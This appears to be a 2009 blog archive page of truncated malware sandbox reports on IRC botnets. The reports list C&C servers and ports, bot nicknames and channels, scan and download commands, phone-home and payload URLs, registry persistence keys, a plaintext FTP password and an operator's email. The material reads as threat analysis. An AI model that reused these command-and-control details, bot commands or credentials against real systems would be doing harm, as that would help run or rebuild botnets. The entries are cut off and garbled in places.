Month: December 2009

Remote Host Port Number174.133.63.91 51987 NICK pLagUe{USA}56265MODE pLagUe{USA}56265 -ixJOIN #H1N1PRIVMSG #H1N1 :USER pLagUe * okTeaM UniX b0at 0.4PC has been ~iNfEctEd~ Other details * The following port was open in the system: Port Protocol Process1051 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + raidhost = “raidhost.exe” so thatRead more...

Remote Host Port Number 64.89.27.36 51987 NICK pLagUe{USA}{LAN}27954 MODE pLagUe{USA}{LAN}27954 -ix JOIN #trees PRIVMSG #trees : PONG irc.lulz.ee USER pLagUe * ok TeaM UniX b0at 0.4 New Infection – Morpheous Stub Other details * The following port was open in the system: Port Protocol Process 1050 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly createdRead more...

Remote Host Port Number69.16.172.40 7000 NICK marthanUSER roland “” “69.16.172.40” :kendrickPONG :2613115303PONG :1661756035PONG :1971802411 Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREClasses.cha o HKEY_LOCAL_MACHINESOFTWAREClasses.chat o HKEY_LOCAL_MACHINESOFTWAREClassesChatFile o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShell o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopencommand o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexec o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecApplication o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecifexec o HKEY_LOCAL_MACHINESOFTWAREClassesChatFileShellopenddeexecTopic o HKEY_LOCAL_MACHINESOFTWAREClassesirc o HKEY_LOCAL_MACHINESOFTWAREClassesircDefaultIcon o HKEY_LOCAL_MACHINESOFTWAREClassesircShell o HKEY_LOCAL_MACHINESOFTWAREClassesircShellopen o HKEY_LOCAL_MACHINESOFTWAREClassesircShellopencommandRead more...

Remote Host Port Number174.133.222.172 445195.190.13.188 7272222.231.29.29 727289.149.244.22 80 * The data identified by the following URL was then requested from the remote web server: o http://hot.jatajoo.ru/hot.php NICK [N00_USA_XP_5605087]USER SP2-366 * 0 :COMPUTERNAMEJOIN #nit openPRIVMSG #modes2 :HTTP SET http://rapidshare.com/files/315648191/rostPRIVMSG #nit :scan// Random Port Scan started on 174.133.x.x:445 with a delay of 3 seconds for 0 minutesRead more...

Name Query Type Query Result Successful Protocol baca.no-ip.org DNS_TYPE_A 94.23.234.102 1 94.23.234.102:9876 Nick: :{00-AUT-XP-pc8-4662}Username: blazeServer Pass: uline131.Joined Channel: #ulineChannel Topic for Channel #uline: “!scan 90 1 85.x.x.x 3 1 85.x.x.x 3 16kkj”Private Message to User {iNF-00-AUT-XP-p`xf6’yxf6’x80xf6’xa0xf8’xb4x84@: “SC// Sequential Port Scan started on 1:90 with a delay of 60 seconds for 3 minutes using 1 threads.”Read more...

Remote Host Port Number200.74.240.149 8094.23.121.227 7000 * The data identified by the following URL was then requested from the remote web server: o http://facebook.freephphosting.biz/illusion/?act=online&s4=25580&s5=0&nickname=Q29tcHV0ZXJOYW1lWzExNDcwM10= Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionConsoleNameSpace o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_NTNDIS o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_NTNDIS000 o HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesntndis o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesntndisSecurity * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionConsoleNameSpace] +Read more...

Remote Host Port Number72.184.197.176 6667 NICK XP|00|USA|SP2|7921USER aqxt 0 0 :XP|00|USA|SP2|7921USERHOST XP|00|USA|SP2|7921MODE XP|00|USA|SP2|7921 +x+iBJOIN #eckoPONG :FederalBereauofInvestigation Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathname with a string SHARE]MSConfig o [pathname with aRead more...

buli.burimche.net:4244chanel:##bb## email from this guy in case u want to ask him about his bots lolburimi@nerashti.com Resolved : [nerashti.com] To [68.180.151.76]

Remote Host Port Number193.242.108.49 80216.45.58.150 8064.120.11.167 5900 * The data identified by the following URLs was then requested from the remote web server: o http://193.242.108.49/Dialer_Min/number.asp o http://www.sitepalace.com/w0rmreaper/NoVaC.jpeg NICK VirUs-jbqiiwehUSER VirUs “” “bud” :8Coded8VirUs..JOIN #THeRaNdOm1# VirusPRIVMSG #THeRaNdOm1# :Success.PONG :DarkSons.Virus.Gov PASS Virus Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{67KLN5J0-4OPM-61WE-KKX2-457QWE23218} * TheRead more...

Remote Host Port Number213.5.65.29 21213.5.65.29 35989213.5.65.29 80 ftp conections:USER cmin04@armageddoncheats.netUSER rmin01@armageddoncheats.netpasswd:123456 * The data identified by the following URLs was then requested from the remote web server: o http://armageddoncheats.net/1.php?p1=COMPUTERNAME_HXOR o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=. o http://armageddoncheats.net/2.php?p1=COMPUTERNAME_HXOR&p2=.. o http://armageddoncheats.net/3.php?p1=COMPUTERNAME_HXOR Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000 o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_IBUFFER000Control o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBuffer o HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesIBufferSecurity oRead more...